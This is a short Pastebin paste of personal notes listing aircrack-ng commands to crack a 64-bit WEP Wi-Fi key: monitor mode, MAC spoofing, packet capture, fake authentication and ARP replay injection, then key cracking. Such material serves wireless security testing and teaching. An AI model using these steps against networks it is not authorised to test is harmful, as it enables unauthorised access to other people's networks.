metalx1000

aircrack notes

Jul 24th, 2014
502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.49 KB | None | 0 0
  1. (Don't forget to disable network manager)
  2. airmon-ng
  3. -list of cards
  4.  
  5. airmon-ng stop wlan0
  6.  
  7. ifconfig wlan0 down
  8.  
  9. macchanger --mac 00:11:22:33:44:55 wlan0
  10.  
  11. airmon-ng start wlan0
  12.  
  13. airodump-ng mon0
  14. - once network is found you can kill it.
  15.  
  16. airodump-ng -c (channel #) -w (output file) --bssid (bssid) mon0
  17.  
  18. *new shell
  19. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (name of net) mon0
  20.  
  21. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 mon0
  22.  
  23. *new shell
  24. aircrackng -n 64 -b (bssid) *.cap
Add Comment
Please, Sign In to add comment